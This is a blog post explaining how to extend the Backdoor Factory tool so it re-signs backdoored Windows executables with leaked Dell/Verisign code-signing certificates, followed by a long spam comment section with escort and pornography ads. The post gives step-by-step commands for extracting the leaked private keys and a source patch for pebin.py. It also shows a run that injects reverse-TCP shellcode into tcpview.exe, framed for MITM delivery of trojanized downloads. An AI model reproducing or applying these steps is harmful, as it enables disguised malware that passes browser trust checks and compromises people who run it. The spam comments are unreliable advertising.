Add PE Code Signing to Backdoor Factory (BDF)

Let's say you want to add PE codesiging to your instance of BDF after you patch PE files.  It's really easy. But to be honest, it's something I will not officially support in BDF for various reasons at the moment. One of them - I don't want to ship signing certs with BDF.  Perhaps I'll release a pro version where I implement everything or I'll teach a class and include stuff like this. Or I'll just tell you below.

Why would you want code signing in BDF?

Internet browsers, like IE/edge, give a pass if the binary is signed (A/V is a another story).  So if a signed binary is delivered via http, MITM'ed, unsigned, patched, the re-signed with a valid cert - a browser like IE should be ok with it. Since BDF is part of BDFProxy, then even better right?

Cool, ready to add code signing to BDF?

First things first, you need some signing certs.




The kind folks at Duo Security did some great research, read it here.

Grab the certs here.

Now BDF runs great on *nix/OSX, so we need something that does PE code signing on linux.

Grab ossligncode as so:

$ git clone git://git.code.sf.net/p/osslsigncode/osslsigncode osslsigncode

To build:

$ ./autogen.sh
$ ./configure
$ make
$ sudo make install

Next we need the signing certs and we need to put them in the BDF directory.

Navigate to your BDF home directory.

the-backdoor-factory git:(master) $
$ curl -O https://www.duosecurity.com/static/files/DellCertificates.zip
$ mkdir certs
$ unzip DellCertificates.zip -d certs

$ tree certs
certs
├── Verisign.pass
├── Verisign.pfx
├── __MACOSX
├── eDellRoot.cer
└── eDellRootLocalhost.cer

Let's use the verisign cert.

We'll need to convert the pfx format to cer/pem as that is what osslsigncode prefers.

$ openssl pkcs12 -in certs/Verisign.pfx -out certs/Verisign.cer -nodes
Enter Import Password: t-span

OK.

Now we need to make a private key.

$ openssl pkcs12 -in certs/Verisign.pfx -nocerts -out certs/VerisignPrivateKey.pem      
Enter Import Password: t-span
MAC verified OK
Enter PEM pass phrase: moomoo
Verifying - Enter PEM pass phrase: moomoo

Let's test everything out:

$ curl -O http://live.sysinternals.com/tcpview.exe  # yay http

$ osslsigncode extract-signature -in tcpview.exe -out sig.txt

$ hexdump -C sig.txt

And you should see something like this: http://pastebin.com/My9UHyjS
Clearly from Microsoft!

Test run:

$ osslsigncode -certs certs/Verisign.cer -key certs/VerisignPrivateKey.pem -n "Securitay" -in tcpview.exe -out tcpview_signed.exe -pass moomoo
Succeeded

$ osslsigncode extract-signature -in tcpview_signed.exe -out sig.txt

$ hexdump -C sig1.txt

And you should see something like this: http://pastebin.com/BSEzgS5q
Clearly not from Microsoft!

And if you upload to VirusTotal you'll see the signature is fully signed in the 'Signers' section and not by MS: https://www.virustotal.com/en/file/65b06e906b17c9f164937826575fc45f4c5f152ef8abfc324368eb46bb0028dc/analysis/1450316795/

Your certs directory should now look as so:
$ tree certs
certs
├── Verisign.cer
├── Verisign.pass
├── Verisign.pfx
├── VerisignPrivateKey.pem
├── __MACOSX
├── eDellRoot.cer
└── eDellRootLocalhost.cer

Time to modify BDF source code!!


Open pebin.py in your favorite editor.

Navigate to the bottom of the "def patch_pe(self):" function.

Near the bottom of that function we will modify...



...with the following code...

if self.ZERO_CERT is True:
            # cert was removed earlier 
            p = subprocess.Popen(['osslsigncode', '-certs', 'certs/Verisign.cer', '-key', \
                                  'certs/VerisignPrivateKey.pem', '-n', 'Security','-in', \
                                   self.flItms["backdoorfile"], '-out', self.flItms["backdoorfile"], '-pass', 'moomoo'])

            p.wait()

... so it looks like this afterwards:


After this mod to BDF you should see the following after running a similar command:

./backdoor.py -f tcpview.exe -s iat_reverse_tcp_inline -H 172.16.186.1 -P 8080 -m automatic
__________                __       .___                   
\______   \_____    ____ |  | __ __| _/____   ___________ 
 |    |  _/\__  \ _/ ___\|  |/ // __ |/  _ \ /  _ \_  __ \ 
 |    |   \ / __ \\  \___|    </ /_/ (  <_> |  <_> )  | \/
 |______  /(____  /\___  >__|_ \____ |\____/ \____/|__|   
        \/      \/     \/     \/    \/                    
___________              __                               
\_   _____/____    _____/  |_  ___________ ___.__.        
 |    __) \__  \ _/ ___\   __\/  _ \_  __ <   |  |        
 |     \   / __ \\  \___|  | (  <_> )  | \/\___  |        
 \___  /  (____  /\___  >__|  \____/|__|   / ____|        
     \/        \/     \/                   \/             

         Author:    Joshua Pitts
         Email:     the.midnite.runr[-at ]gmail<d o-t>com
         Twitter:   @midnite_runr
         IRC:       freenode.net #BDFactory
         
         Version:   3.2.4
         
[*] In the backdoor module
[*] Checking if binary is supported
[*] Gathering file info
[*] Reading win32 entry instructions
[*] Gathering file info
[*] Overwriting certificate table pointer
[*] Loading PE in pefile
[*] Parsing data directories
[*] Looking for and setting selected shellcode
[*] Creating win32 resume execution stub
[*] Looking for caves that will fit the minimum shellcode length of 87
[*] All caves lengths:  145, 162, 87
[*] Attempting PE File Automatic Patching
[!] Selected: 50: Section Name: .data; Cave begin: 0x44cc5 End: 0x44d6b; Cave Size: 166; Payload Size: 162
[!] Selected: 32: Section Name: .text; Cave begin: 0x3a304 End: 0x3a399; Cave Size: 149; Payload Size: 145
[!] Selected: 45: Section Name: .rdata; Cave begin: 0x3fba0 End: 0x3fc46; Cave Size: 166; Payload Size: 87
[*] Changing flags for section: .rdata
[*] Changing flags for section: .text
[*] Changing flags for section: .data
[*] Patching initial entry instructions
[*] Creating win32 resume execution stub
[*] Looking for and setting selected shellcode
Succeeded
File tcpview.exe is in the 'backdoored' directory

Note the 'Succeeded'.

As expected, here's the result with a valid signature from Atheros:


This can be done with any PE code signing cert that is released leaked to the public.  Get creative! If you think this should be part of BDF, let me know on twitter or github.

Cheers.


Comments

  1. Health Is God is the main finish wellbeing and health site that you may portray as it yours. We made a site that presents the accumulation of wellbeing and way of life data bolstered by solid substance suppliers and certifiable client surveys. This is a true exertion on our part to deliver a client encounter which is drawing in, moving, and intuitive. Health Is God expects to convey the most ideal wellbeing surveys of the supplement accumulations and different wellbeing generation that range from skincare to mind, muscle, male upgrade and cerebrum wellbeing conditions. You, the client are of most extreme significance to us, and we are focused on being the entrance that maintains your sound way of life.

    ReplyDelete
  2. Nutra Trials defines personal characteristics of different health products including skincare, weight loss, muscle and male enhancement. The study presented here is briefly described for reader convenience and to deliver them assurance with health standards. The best possible answers are given here regarding the selection of an ideal supplement or cream or serum that possibly remains to be safe for health and do not cause any side effects.

    ReplyDelete
  3. I think this is a real great article post.Really looking forward to read more. Visit at
    Crazy Video Hub

    ReplyDelete
  4. It is a great job, I like your posts and wish you all the best. and I hope you continue this job well.
    NutraT line

    ReplyDelete
  5. I really appreciate for your brilliant Efforts on spending time to post this information in a simple and systematic manner, so That visitors and readers can easily Understand the concept.I Efforts must appreciate you posting these on information...
    kim kardashian sex tape
    porn sex video hd
    mia khalifa sex video
    sunny leone sexy movie

    ReplyDelete
  6. We are the most reputed and reliable Islamabad Escorts Service Agency We will arrange an incredible date for you They are Most pretty and broad-minded you can truly make all your desires come true with our Escorts in Islamabad service offering cheap and VIP girl in at affordable Price they fulfil your wishes and provide you great services Call us for booking.

    ReplyDelete
  7. Hello, I am thomus jons thank you for this informative post. That is a great job. Wish you more success.Thank you so much and for you all the best. Takes Down
    123movies

    ReplyDelete
  8. Times For Health is Online Health & Wellness Program! I came on the your post and i got so information here. Thanks for the valuable post. https://www.timesforhealth.com/

    ReplyDelete
  9. TecSmash is your ultimate source of Technology news and Make Money Online product reviews. We research and review all Tech, MMO, Biz Opp and IM products.
    Tecsmash

    ReplyDelete
  10. Best softwares for Internet Marketers and legitimate make money online opportunities.
    cxyrc

    ReplyDelete
  11. HealRun is a health news blog we provide the latest news about health, Drugs and latest Diseases and conditions. We update our users with health tips and health products reviews. If you want to know any information about health or health product (Side Effects & Benefits) Feel Free To ask HealRun Support Team.

    ReplyDelete
  12. Here is our FB SociCake Review, in which I have revealed the good, bad and ugly about Mario Browns FB SociCake Facebook Marketing Tool. socicake review

    ReplyDelete
  13. Pilpedia is supplying 100 percent original and accurate information at each moment of time around our site and merchandise, and the intent is to improve the usage of good and pure health supplement. For More Info please visit Pilpedia online store.

    ReplyDelete
  14. Supplements For Fitness consumers who buy their products. The FDA mentions five business associations with which they interact and dietary supplement companies must investigate joining them. They are the Council for Responsible Nutrition, the Natural Products Association, the United Natural Products Alliance (UNPA), the Consumer Health .

    ReplyDelete
  15. We are here to give you a complete review on the Parallel Profit project by Steve Clayton and Aidan Booth. If you are someone from the field you would already be familiar with these two names, for those of who are new. Parallel Profits Review

    ReplyDelete
  16. If you are a beginner and want to earn quick money through FX trading, then it is advised to go through Trend Mystery reviews. You will be able to learn about various tools and strategies with the help of which you will be able to earn a huge amount of benefits.Trend Mystery Review

    ReplyDelete
  17. WiredReach.org is dedicated to bring you the best in Internet Marketing, Blogging and the entire Make Money Online spectrum. We are your finest source of info.

    ReplyDelete
  18. Revuesdefaits defines personal characteristics of various health merchandise together with skincare, weight loss, muscle and male enhancement. The study presented here is briefly described for reader convenience and to deliver them assurance with health standards. The best potential answers are given here concerning the selection of a perfect supplement or cream or serum that presumably remains to be safe for health and do not cause any facet effects.

    http://revuesdefaits.fr/testoultra/

    ReplyDelete
  19. The Probiotic supplement helps to balance good bacteria and in this regard, Probiotic t-50 review is creating buzz. How far is the supplement reliable and worth considering, you will come to know about it here.

    ReplyDelete
  20. Buyers Reviews defines personal characteristics of different health products including skincare, weightloss, muscle and male enhancement.Buyers Reviews is supplying 100% original and accurate information at each moment of time around our site and merchandise, and the intent is to improve the usage of good and pure health supplement.

    ReplyDelete
  21. This is an informative Blog , Thanks. Hope you share new informative blogs. If anyone interested in door security CONTACT US NOW Best door security services for home and offices with high security deadbolt locks

    ReplyDelete

Post a Comment

Popular Posts